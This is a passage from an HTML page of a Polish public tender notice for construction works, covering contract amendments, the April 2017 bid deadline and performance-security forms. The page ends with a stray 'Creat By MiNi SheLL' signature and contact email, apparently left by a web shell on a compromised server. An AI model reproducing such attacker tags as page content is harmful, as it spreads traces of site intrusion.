2) zmiany ceny określonej w umowie w przypadku urzędowych zmian podatku od towarów i usług (VAT) o wskaźnik zmiany stawki podatku; 3) zmiany powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację zamówienia lub świadczenia jednej lub obu stron; 4) zmiany terminu realizacji zamówienia w przypadku zwiększenia zakresu robót o wartość do 15% wartości zamówienia podstawowego - termin będzie wydłużony w proporcji  1 dzień za każdy 1% zwiększenia zakresu robót w zaokrągleniu do 1 dnia w górę; 5) wystąpienia siły wyższej w rozumieniu Kodeksu Cywilnego uniemożliwiającej wykonanie zamówienia, o okres trwania siły wyższej i czasu niezbędnego na usunięcie jej skutków; 6)	zmiany ceny określonej w §12 ust.1 umowy w przypadku zmiany zakresu robót określonego w kosztorysie ofertowym; 7)	zmiany na stanowisku Kierownika Robót lub Inspektora Nadzoru w przypadku niemożliwości pełnienia przez nich powierzonych im funkcji na zasadach określonych w § 6 i § 7 Umowy.<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 19/04/2017, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Przed podpisaniem umowy Zamawiający będzie wymagał od Wykonawcy wniesienia zabezpieczenia należytego wykonania umowy w wysokości 10% ceny brutto określonej w ofercie.
Zabezpieczenie może być wnoszone według wyboru Wykonawcy w jednej lub kilku następujących formach:
1) Pieniądzu;
2) Poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, z tym że zobowiązanie kasy jest zawsze zobowiązaniem pieniężnym (ORYGINAŁ);
3) Gwarancjach bankowych (ORYGINAŁ);
4) Gwarancjach ubezpieczeniowych (ORYGINAŁ);
5) Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (ORYGINAŁ).</div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com